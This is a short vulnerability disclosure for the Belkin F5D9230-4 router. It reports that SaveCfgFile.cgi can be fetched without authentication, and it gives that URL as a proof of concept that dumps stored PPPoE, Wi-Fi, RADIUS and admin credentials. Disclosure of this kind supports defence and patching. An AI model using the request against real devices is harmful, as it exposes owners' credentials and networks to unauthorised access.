Belkin Wireless G Plus MIMO Router F5D9230-4 Authentication Bypass Vulnerability

VULNERABILITY:

Belkin Wireless G Plus MIMO Router F5D9230-4

Authentication Bypass Vulnerability

AUTHOR:

DarkFig < gmdarkfig (at) gmail (dot) com >

http://acid-root.new.fr/?0:17

#[email protected]

INTRODUCTION:

I recently bought this router for my local

network (without modem integrated), now I can tell

that it was a bad choice. When my ISP disconnects

me from internet, in the most case I have to reboot

my Modem and the Router in order to reconnect.

So I coded a program (which send http packets) to reboot

my router, it asks me the router password, and reboots it.

One day I wrote a bad password, but it worked. So I

decided to make some tests in order to see if there was

a vulnerability.

DESCRIPTION:

Apparently when we the router starts, it create a file

(without content) named user.conf, then when we go to

SaveCfgFile.cgi, the configuration is save to the file

user.conf. But the problem is that we can access

(and also change) to the file SaveCfgFile.cgi without

login.

PROOF OF CONCEPT:

For example we can get the configuration file here:

http://<ROUTER_IP>/SaveCfgFile.cgi

pppoe_username=…

pppoe_password=…

wl0_pskkey=…

wl0_key1=…

mradius_password=…

mradius_secret=…

httpd_password=…

http_passwd=…

pppoe_passwd=…

Tested on the latest firmware for this product

(version 3.01.53).

PATCH

Actually there is no firmware update, but I contacted the

author, if they'll release a patch, it will be available here:

http://web.belkin.com/support/download/download.asp

?download=F5D9230-4&lang=1&mode=